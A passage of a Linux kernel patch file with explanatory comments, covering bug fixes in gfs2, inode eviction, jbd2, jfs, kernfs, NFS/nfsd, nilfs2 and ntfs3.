+ 	if (!sb_rdonly(sdp->sd_vfs)) {
+-		struct gfs2_holder freeze_gh;
+-
+-		gfs2_holder_mark_uninitialized(&freeze_gh);
+-		if (sdp->sd_freeze_gl &&
+-		    !gfs2_glock_is_locked_by_me(sdp->sd_freeze_gl)) {
+-			ret = gfs2_freeze_lock(sdp, &freeze_gh,
+-				       log_write_allowed ? 0 : LM_FLAG_TRY);
+-			if (ret == GLR_TRYFAILED)
+-				ret = 0;
++		bool locked = mutex_trylock(&sdp->sd_freeze_mutex);
++
++		if (sdp->sd_quotad_process &&
++		    current != sdp->sd_quotad_process) {
++			kthread_stop(sdp->sd_quotad_process);
++			sdp->sd_quotad_process = NULL;
+ 		}
+-		if (!ret)
+-			gfs2_make_fs_ro(sdp);
++
++		if (sdp->sd_logd_process &&
++		    current != sdp->sd_logd_process) {
++			kthread_stop(sdp->sd_logd_process);
++			sdp->sd_logd_process = NULL;
++		}
++
++		wait_event_timeout(sdp->sd_log_waitq,
++				   gfs2_log_is_empty(sdp),
++				   HZ * 5);
++
++		sdp->sd_vfs->s_flags |= SB_RDONLY;
++
++		if (locked)
++			mutex_unlock(&sdp->sd_freeze_mutex);
++
+ 		/*
+ 		 * Dequeue any pending non-system glock holders that can no
+ 		 * longer be granted because the file system is withdrawn.
+ 		 */
+ 		gfs2_gl_dq_holders(sdp);
+-		gfs2_freeze_unlock(&freeze_gh);
+ 	}
+ 
+ 	if (sdp->sd_lockstruct.ls_ops->lm_lock == NULL) { /* lock_nolock */
+@@ -187,15 +197,8 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	}
+ 	sdp->sd_jinode_gh.gh_flags |= GL_NOCACHE;
+ 	gfs2_glock_dq(&sdp->sd_jinode_gh);
+-	if (test_bit(SDF_FS_FROZEN, &sdp->sd_flags)) {
+-		/* Make sure gfs2_unfreeze works if partially-frozen */
+-		flush_work(&sdp->sd_freeze_work);
+-		atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
+-		thaw_super(sdp->sd_vfs);
+-	} else {
+-		wait_on_bit(&i_gl->gl_flags, GLF_DEMOTE,
+-			    TASK_UNINTERRUPTIBLE);
+-	}
++	gfs2_thaw_freeze_initiator(sdp->sd_vfs);
++	wait_on_bit(&i_gl->gl_flags, GLF_DEMOTE, TASK_UNINTERRUPTIBLE);
+ 
+ 	/*
+ 	 * holder_uninit to force glock_put, to force dlm to let go
+diff --git a/fs/gfs2/util.h b/fs/gfs2/util.h
+index 78ec190f4155b..3291e33e81e97 100644
+--- a/fs/gfs2/util.h
++++ b/fs/gfs2/util.h
+@@ -149,8 +149,9 @@ int gfs2_io_error_i(struct gfs2_sbd *sdp, const char *function,
+ 
+ extern int check_journal_clean(struct gfs2_sbd *sdp, struct gfs2_jdesc *jd,
+ 			       bool verbose);
+-extern int gfs2_freeze_lock(struct gfs2_sbd *sdp,
+-			    struct gfs2_holder *freeze_gh, int caller_flags);
++extern int gfs2_freeze_lock_shared(struct gfs2_sbd *sdp,
++				   struct gfs2_holder *freeze_gh,
++				   int caller_flags);
+ extern void gfs2_freeze_unlock(struct gfs2_holder *freeze_gh);
+ 
+ #define gfs2_io_error(sdp) \
+diff --git a/fs/inode.c b/fs/inode.c
+index 8cfda7a6d5900..417ba66af4a3b 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -486,6 +486,39 @@ static void inode_lru_list_del(struct inode *inode)
+ 		this_cpu_dec(nr_unused);
+ }
+ 
++static void inode_pin_lru_isolating(struct inode *inode)
++{
++	lockdep_assert_held(&inode->i_lock);
++	WARN_ON(inode->i_state & (I_LRU_ISOLATING | I_FREEING | I_WILL_FREE));
++	inode->i_state |= I_LRU_ISOLATING;
++}
++
++static void inode_unpin_lru_isolating(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	WARN_ON(!(inode->i_state & I_LRU_ISOLATING));
++	inode->i_state &= ~I_LRU_ISOLATING;
++	smp_mb();
++	wake_up_bit(&inode->i_state, __I_LRU_ISOLATING);
++	spin_unlock(&inode->i_lock);
++}
++
++static void inode_wait_for_lru_isolating(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	if (inode->i_state & I_LRU_ISOLATING) {
++		DEFINE_WAIT_BIT(wq, &inode->i_state, __I_LRU_ISOLATING);
++		wait_queue_head_t *wqh;
++
++		wqh = bit_waitqueue(&inode->i_state, __I_LRU_ISOLATING);
++		spin_unlock(&inode->i_lock);
++		__wait_on_bit(wqh, &wq, bit_wait, TASK_UNINTERRUPTIBLE);
++		spin_lock(&inode->i_lock);
++		WARN_ON(inode->i_state & I_LRU_ISOLATING);
++	}
++	spin_unlock(&inode->i_lock);
++}
++
+ /**
+  * inode_sb_list_add - add inode to the superblock list of inodes
+  * @inode: inode to add
+@@ -654,6 +687,8 @@ static void evict(struct inode *inode)
+ 
+ 	inode_sb_list_del(inode);
+ 
++	inode_wait_for_lru_isolating(inode);
++
+ 	/*
+ 	 * Wait for flusher thread to be done with the inode so that filesystem
+ 	 * does not start destroying it while writeback is still running. Since
+@@ -855,7 +890,7 @@ static enum lru_status inode_lru_isolate(struct list_head *item,
+ 	 * be under pressure before the cache inside the highmem zone.
+ 	 */
+ 	if (inode_has_buffers(inode) || !mapping_empty(&inode->i_data)) {
+-		__iget(inode);
++		inode_pin_lru_isolating(inode);
+ 		spin_unlock(&inode->i_lock);
+ 		spin_unlock(lru_lock);
+ 		if (remove_inode_buffers(inode)) {
+@@ -868,7 +903,7 @@ static enum lru_status inode_lru_isolate(struct list_head *item,
+ 			if (current->reclaim_state)
+ 				current->reclaim_state->reclaimed_slab += reap;
+ 		}
+-		iput(inode);
++		inode_unpin_lru_isolating(inode);
+ 		spin_lock(lru_lock);
+ 		return LRU_RETRY;
+ 	}
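
The inode.c change replaces a full reference grab (__iget()/iput()) with the new I_LRU_ISOLATING state bit while the shrinker strips buffers and pages: dropping the last reference via iput() from reclaim context could re-enter the filesystem, whereas a state bit plus wake_up_bit() merely makes evict() wait. The underlying pin/wait-on-bit idiom, reduced to a self-contained sketch with a hypothetical object and flag bit:

	#include <linux/bitops.h>
	#include <linux/wait_bit.h>
	#include <linux/sched.h>

	#define OBJ_PINNED	0	/* hypothetical bit in obj->flags */

	struct obj {
		unsigned long flags;
	};

	static void obj_pin(struct obj *o)
	{
		set_bit(OBJ_PINNED, &o->flags);
	}

	static void obj_unpin(struct obj *o)
	{
		clear_bit(OBJ_PINNED, &o->flags);
		smp_mb__after_atomic();	/* order the clear before the wakeup */
		wake_up_bit(&o->flags, OBJ_PINNED);
	}

	static void obj_wait_unpinned(struct obj *o)
	{
		/* sleeps until OBJ_PINNED is clear */
		wait_on_bit(&o->flags, OBJ_PINNED, TASK_UNINTERRUPTIBLE);
	}
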
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index c8d59f7c47453..d3d3ea439d29b 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -971,10 +971,13 @@ int jbd2_journal_bmap(journal_t *journal, unsigned long blocknr,
+ {
+ 	int err = 0;
+ 	unsigned long long ret;
+-	sector_t block = 0;
++	sector_t block = blocknr;
+ 
+-	if (journal->j_inode) {
+-		block = blocknr;
++	if (journal->j_bmap) {
++		err = journal->j_bmap(journal, &block);
++		if (err == 0)
++			*retp = block;
++	} else if (journal->j_inode) {
+ 		ret = bmap(journal->j_inode, &block);
+ 
+ 		if (ret || !block) {
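
jbd2_journal_bmap() now prefers a filesystem-supplied j_bmap callback over calling bmap() on the journal inode, letting a filesystem that knows its journal layout translate blocks without the generic bmap path. Judging only by the call site above, the hook takes the journal and a block number it rewrites in place; JOURNAL_START and my_journal_bmap below are invented for illustration:

	/* Hypothetical client: logical journal block N lives at JOURNAL_START + N. */
	#define JOURNAL_START 8192	/* assumed on-disk journal offset */

	static int my_journal_bmap(journal_t *journal, sector_t *block)
	{
		*block += JOURNAL_START;
		return 0;		/* 0 = success; *block holds the result */
	}

	/* installed once at journal-creation time:
	 *	journal->j_bmap = my_journal_bmap;
	 */
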
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 4462274e325ac..d2df00676292d 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -1626,6 +1626,8 @@ s64 dbDiscardAG(struct inode *ip, int agno, s64 minlen)
+ 		} else if (rc == -ENOSPC) {
+ 			/* search for next smaller log2 block */
+ 			l2nb = BLKSTOL2(nblocks) - 1;
++			if (unlikely(l2nb < 0))
++				break;
+ 			nblocks = 1LL << l2nb;
+ 		} else {
+ 			/* Trim any already allocated blocks */
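
The dbDiscardAG() guard exists because BLKSTOL2(nblocks) - 1 goes negative once the retry loop has shrunk the request to a single block, and a shift by a negative count is undefined behaviour in C. The failing sequence, spelled out (assuming BLKSTOL2 is the usual floor log2, so BLKSTOL2(1) == 0):

	/* Illustrative only. */
	static void discard_retry_sketch(void)
	{
		s64 nblocks = 1;
		int l2nb = 0 - 1;	/* BLKSTOL2(1) - 1 evaluates to -1    */

		if (unlikely(l2nb < 0))
			return;		/* the new guard: stop the search     */
		nblocks = 1LL << l2nb;	/* only reached when the shift is safe */
		(void)nblocks;
	}
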
+diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c
+index 031d8f570f581..5d3127ca68a42 100644
+--- a/fs/jfs/jfs_dtree.c
++++ b/fs/jfs/jfs_dtree.c
+@@ -834,6 +834,8 @@ int dtInsert(tid_t tid, struct inode *ip,
+ 	 * the full page.
+ 	 */
+ 	DT_GETSEARCH(ip, btstack->top, bn, mp, p, index);
++	if (p->header.freelist == 0)
++		return -EINVAL;
+ 
+ 	/*
+ 	 *	insert entry for new key
+diff --git a/fs/kernfs/file.c b/fs/kernfs/file.c
+index e4a50e4ff0d23..adf3536cfec81 100644
+--- a/fs/kernfs/file.c
++++ b/fs/kernfs/file.c
+@@ -532,9 +532,11 @@ static int kernfs_fop_mmap(struct file *file, struct vm_area_struct *vma)
+ 		goto out_put;
+ 
+ 	rc = 0;
+-	of->mmapped = true;
+-	of_on(of)->nr_mmapped++;
+-	of->vm_ops = vma->vm_ops;
++	if (!of->mmapped) {
++		of->mmapped = true;
++		of_on(of)->nr_mmapped++;
++		of->vm_ops = vma->vm_ops;
++	}
+ 	vma->vm_ops = &kernfs_vm_ops;
+ out_put:
+ 	kernfs_put_active(of->kn);
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 4448ff829cbb9..8c1f47ca5dc53 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -1997,6 +1997,14 @@ pnfs_update_layout(struct inode *ino,
+ 	}
+ 
+ lookup_again:
++	if (!nfs4_valid_open_stateid(ctx->state)) {
++		trace_pnfs_update_layout(ino, pos, count,
++					 iomode, lo, lseg,
++					 PNFS_UPDATE_LAYOUT_INVALID_OPEN);
++		lseg = ERR_PTR(-EIO);
++		goto out;
++	}
++
+ 	lseg = ERR_PTR(nfs4_client_recover_expired_lease(clp));
+ 	if (IS_ERR(lseg))
+ 		goto out;
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 7451cd34710d0..df9dbd93663e2 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1106,6 +1106,7 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	};
+ 	struct inode *inode;
+ 	__be32 status = nfs_ok;
++	bool save_no_wcc;
+ 	int err;
+ 
+ 	if (setattr->sa_iattr.ia_valid & ATTR_SIZE) {
+@@ -1131,8 +1132,11 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 
+ 	if (status)
+ 		goto out;
++	save_no_wcc = cstate->current_fh.fh_no_wcc;
++	cstate->current_fh.fh_no_wcc = true;
+ 	status = nfsd_setattr(rqstp, &cstate->current_fh, &attrs,
+ 				0, (time64_t)0);
++	cstate->current_fh.fh_no_wcc = save_no_wcc;
+ 	if (!status)
+ 		status = nfserrno(attrs.na_labelerr);
+ 	if (!status)
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 8d15959004ad2..f04de2553c90b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -318,6 +318,7 @@ free_nbl(struct kref *kref)
+ 	struct nfsd4_blocked_lock *nbl;
+ 
+ 	nbl = container_of(kref, struct nfsd4_blocked_lock, nbl_kref);
++	locks_release_private(&nbl->nbl_lock);
+ 	kfree(nbl);
+ }
+ 
+@@ -325,7 +326,6 @@ static void
+ free_blocked_lock(struct nfsd4_blocked_lock *nbl)
+ {
+ 	locks_delete_block(&nbl->nbl_lock);
+-	locks_release_private(&nbl->nbl_lock);
+ 	kref_put(&nbl->nbl_kref, free_nbl);
+ }
+ 
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 813ae75e7128e..2feaa49fb9fe2 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -709,6 +709,7 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	char *mesg = buf;
+ 	int fd, err;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	err = get_int(&mesg, &fd);
+ 	if (err != 0 || fd < 0)
+@@ -718,13 +719,15 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
++	serv = nn->nfsd_serv;
++	err = svc_addsock(serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err >= 0 &&
+-	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+-		svc_get(nn->nfsd_serv);
++	if (err < 0 && !serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++	else if (err >= 0 && !serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++		svc_get(serv);
+ 
+-	nfsd_put(net);
++	svc_put(serv);
+ 	return err;
+ }
+ 
+@@ -738,6 +741,7 @@ static ssize_t __write_ports_addxprt(char *buf, struct net *net, const struct cr
+ 	struct svc_xprt *xprt;
+ 	int port, err;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	if (sscanf(buf, "%15s %5u", transport, &port) != 2)
+ 		return -EINVAL;
+@@ -749,29 +753,33 @@ static ssize_t __write_ports_addxprt(char *buf, struct net *net, const struct cr
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_xprt_create(nn->nfsd_serv, transport, net,
++	serv = nn->nfsd_serv;
++	err = svc_xprt_create(serv, transport, net,
+ 			      PF_INET, port, SVC_SOCK_ANONYMOUS, cred);
+ 	if (err < 0)
+ 		goto out_err;
+ 
+-	err = svc_xprt_create(nn->nfsd_serv, transport, net,
++	err = svc_xprt_create(serv, transport, net,
+ 			      PF_INET6, port, SVC_SOCK_ANONYMOUS, cred);
+ 	if (err < 0 && err != -EAFNOSUPPORT)
+ 		goto out_close;
+ 
+-	if (!nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+-		svc_get(nn->nfsd_serv);
++	if (!serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++		svc_get(serv);
+ 
+-	nfsd_put(net);
++	svc_put(serv);
+ 	return 0;
+ out_close:
+-	xprt = svc_find_xprt(nn->nfsd_serv, transport, net, PF_INET, port);
++	xprt = svc_find_xprt(serv, transport, net, PF_INET, port);
+ 	if (xprt != NULL) {
+ 		svc_xprt_close(xprt);
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
+-	nfsd_put(net);
++	if (!serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++
++	svc_put(serv);
+ 	return err;
+ }
+ 
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 0e557fb60a0e3..996f3f62335b2 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,8 +97,6 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-void		nfsd_put(struct net *net);
+-
+ bool		i_am_nfsd(void);
+ 
+ struct nfsdfs_client {
+@@ -134,6 +132,7 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
++void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 9eb529969b224..80a2b3631adbf 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -532,9 +532,14 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
++void nfsd_last_thread(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv = nn->nfsd_serv;
++
++	spin_lock(&nfsd_notifier_lock);
++	nn->nfsd_serv = NULL;
++	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -544,6 +549,8 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ #endif
+ 	}
+ 
++	svc_xprt_destroy_all(serv, net);
++
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -555,7 +562,6 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ 		return;
+ 
+ 	nfsd_shutdown_net(net);
+-	pr_info("nfsd: last server has exited, flushing export cache\n");
+ 	nfsd_export_flush(net);
+ }
+ 
+@@ -634,7 +640,8 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_put(net);
++	nfsd_last_thread(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -665,9 +672,6 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
+-		/* NOT nfsd_put() as notifiers (see below) haven't
+-		 * been set up yet.
+-		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -710,29 +714,6 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
+-/* This is the callback for kref_put() below.
+- * There is no code here as the first thing to be done is
+- * call svc_shutdown_net(), but we cannot get the 'net' from
+- * the kref.  So do all the work when kref_put returns true.
+- */
+-static void nfsd_noop(struct kref *ref)
+-{
+-}
+-
+-void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
+-		svc_xprt_destroy_all(nn->nfsd_serv, net);
+-		nfsd_last_thread(nn->nfsd_serv, net);
+-		svc_destroy(&nn->nfsd_serv->sv_refcnt);
+-		spin_lock(&nfsd_notifier_lock);
+-		nn->nfsd_serv = NULL;
+-		spin_unlock(&nfsd_notifier_lock);
+-	}
+-}
+-
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -783,7 +764,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	nfsd_put(net);
++	svc_put(nn->nfsd_serv);
+ 	return err;
+ }
+ 
+@@ -796,8 +777,8 @@ int
+ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ {
+ 	int	error;
+-	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -815,24 +796,23 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	error = nfsd_create_serv(net);
+ 	if (error)
+ 		goto out;
+-
+-	nfsd_up_before = nn->nfsd_net_up;
++	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
++	error = svc_set_num_threads(serv, NULL, nrservs);
+ 	if (error)
+-		goto out_shutdown;
+-	error = nn->nfsd_serv->sv_nrthreads;
+-out_shutdown:
+-	if (error < 0 && !nfsd_up_before)
+-		nfsd_shutdown_net(net);
++		goto out_put;
++	error = serv->sv_nrthreads;
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		nfsd_put(net);
+-	nfsd_put(net);
++		svc_put(serv);
++
++	if (serv->sv_nrthreads == 0)
++		nfsd_last_thread(net);
++	svc_put(serv);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+@@ -983,31 +963,8 @@ nfsd(void *vrqstp)
+ 	atomic_dec(&nfsd_th_cnt);
+ 
+ out:
+-	/* Take an extra ref so that the svc_put in svc_exit_thread()
+-	 * doesn't call svc_destroy()
+-	 */
+-	svc_get(nn->nfsd_serv);
+-
+ 	/* Release the thread */
+ 	svc_exit_thread(rqstp);
+-
+-	/* We need to drop a ref, but may not drop the last reference
+-	 * without holding nfsd_mutex, and we cannot wait for nfsd_mutex as that
+-	 * could deadlock with nfsd_shutdown_threads() waiting for us.
+-	 * So three options are:
+-	 * - drop a non-final reference,
+-	 * - get the mutex without waiting
+-	 * - sleep briefly and try the above again
+-	 */
+-	while (!svc_put_not_last(nn->nfsd_serv)) {
+-		if (mutex_trylock(&nfsd_mutex)) {
+-			nfsd_put(net);
+-			mutex_unlock(&nfsd_mutex);
+-			break;
+-		}
+-		msleep(20);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 17e96e58e7727..8f6d611d13803 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -475,7 +475,7 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	int		accmode = NFSD_MAY_SATTR;
+ 	umode_t		ftype = 0;
+ 	__be32		err;
+-	int		host_err;
++	int		host_err = 0;
+ 	bool		get_write_count;
+ 	bool		size_change = (iap->ia_valid & ATTR_SIZE);
+ 	int		retries;
+@@ -533,6 +533,7 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	}
+ 
+ 	inode_lock(inode);
++	fh_fill_pre_attrs(fhp);
+ 	for (retries = 1;;) {
+ 		struct iattr attrs;
+ 
+@@ -560,13 +561,14 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		attr->na_aclerr = set_posix_acl(&init_user_ns,
+ 						inode, ACL_TYPE_DEFAULT,
+ 						attr->na_dpacl);
++	fh_fill_post_attrs(fhp);
+ 	inode_unlock(inode);
+ 	if (size_change)
+ 		put_write_access(inode);
+ out:
+ 	if (!host_err)
+ 		host_err = commit_metadata(fhp);
+-	return nfserrno(host_err);
++	return err != 0 ? err : nfserrno(host_err);
+ }
+ 
+ #if defined(CONFIG_NFSD_V4)
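
nfsd_setattr() now captures pre- and post-operation attributes itself, under the same inode_lock() that covers the change, so the weak-cache-consistency data a client sees corresponds to one atomic attribute update; the NFSv4 caller opts out through the fh_no_wcc save/restore in the nfs4proc.c hunk earlier. The bracketing pattern in isolation (a condensed excerpt, not the full function):

	inode_lock(inode);
	fh_fill_pre_attrs(fhp);		/* pre-op attribute snapshot         */
	/* ... apply the attribute change ... */
	fh_fill_post_attrs(fhp);	/* post-op snapshot, lock still held */
	inode_unlock(inode);
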
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index bd24a33fc72e1..42617080a8384 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -2224,6 +2224,7 @@ static int nilfs_btree_assign_p(struct nilfs_bmap *btree,
+ 	/* on-disk format */
+ 	binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
+ 	binfo->bi_dat.bi_level = level;
++	memset(binfo->bi_dat.bi_pad, 0, sizeof(binfo->bi_dat.bi_pad));
+ 
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 242cc36bf1e97..351010828d883 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -158,6 +158,7 @@ void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
+ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+ 	struct nilfs_dat_entry *entry;
++	__u64 start;
+ 	sector_t blocknr;
+ 	void *kaddr;
+ 	int ret;
+@@ -169,6 +170,7 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
+ 	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
+ 					     req->pr_entry_bh, kaddr);
++	start = le64_to_cpu(entry->de_start);
+ 	blocknr = le64_to_cpu(entry->de_blocknr);
+ 	kunmap_atomic(kaddr);
+ 
+@@ -179,6 +181,15 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 			return ret;
+ 		}
+ 	}
++	if (unlikely(start > nilfs_mdt_cno(dat))) {
++		nilfs_err(dat->i_sb,
++			  "vblocknr = %llu has abnormal lifetime: start cno (= %llu) > current cno (= %llu)",
++			  (unsigned long long)req->pr_entry_nr,
++			  (unsigned long long)start,
++			  (unsigned long long)nilfs_mdt_cno(dat));
++		nilfs_dat_abort_entry(dat, req);
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/direct.c b/fs/nilfs2/direct.c
+index 8f802f7b0840b..893ab36824cc2 100644
+--- a/fs/nilfs2/direct.c
++++ b/fs/nilfs2/direct.c
+@@ -319,6 +319,7 @@ static int nilfs_direct_assign_p(struct nilfs_bmap *direct,
+ 
+ 	binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
+ 	binfo->bi_dat.bi_level = 0;
++	memset(binfo->bi_dat.bi_pad, 0, sizeof(binfo->bi_dat.bi_pad));
+ 
+ 	return 0;
+ }
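
Both nilfs2 hunks plug the same hole: bi_dat.bi_pad was left uninitialized before the structure was written out, leaking stray kernel bytes into the on-disk format. Explicitly zeroing padding is the standard fix whenever a struct reaches the media; an illustrative stand-in (the struct below is hypothetical, shaped like the binfo fields above):

	struct on_disk_binfo_like {
		__le64 bi_blkoff;
		__u8   bi_level;
		__u8   bi_pad[7];	/* padding bytes reach the disk too */
	};

	static void fill_binfo(struct on_disk_binfo_like *b, u64 key, u8 level)
	{
		b->bi_blkoff = cpu_to_le64(key);
		b->bi_level = level;
		memset(b->bi_pad, 0, sizeof(b->bi_pad)); /* never leak old bytes */
	}
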
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index dfe4930ccec64..70d9d08fc61bc 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -656,7 +656,7 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	wnd->total_zeroes = nbits;
+ 	wnd->extent_max = MINUS_ONE_T;
+ 	wnd->zone_bit = wnd->zone_end = 0;
+-	wnd->nwnd = bytes_to_block(sb, bitmap_size(nbits));
++	wnd->nwnd = bytes_to_block(sb, ntfs3_bitmap_size(nbits));
+ 	wnd->bits_last = nbits & (wbits - 1);
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+@@ -1320,7 +1320,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 		return -EINVAL;
+ 
+ 	/* Align to 8 byte boundary. */
+-	new_wnd = bytes_to_block(sb, bitmap_size(new_bits));
++	new_wnd = bytes_to_block(sb, ntfs3_bitmap_size(new_bits));
+ 	new_last = new_bits & (wbits - 1);
+ 	if (!new_last)
+ 		new_last = wbits;
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 02465ab3f398c..6cce71cc750ea 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1897,6 +1897,47 @@ enum REPARSE_SIGN ni_parse_reparse(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	return REPARSE_LINK;
+ }
+ 
++/*
++ * fiemap_fill_next_extent_k - a copy of fiemap_fill_next_extent
++ * but it accepts a kernel address for fi_extents_start
++ */
++static int fiemap_fill_next_extent_k(struct fiemap_extent_info *fieinfo,
++				     u64 logical, u64 phys, u64 len, u32 flags)
++{
++	struct fiemap_extent extent;
++	struct fiemap_extent __user *dest = fieinfo->fi_extents_start;
++
++	/* only count the extents */
++	if (fieinfo->fi_extents_max == 0) {
++		fieinfo->fi_extents_mapped++;
++		return (flags & FIEMAP_EXTENT_LAST) ? 1 : 0;
++	}
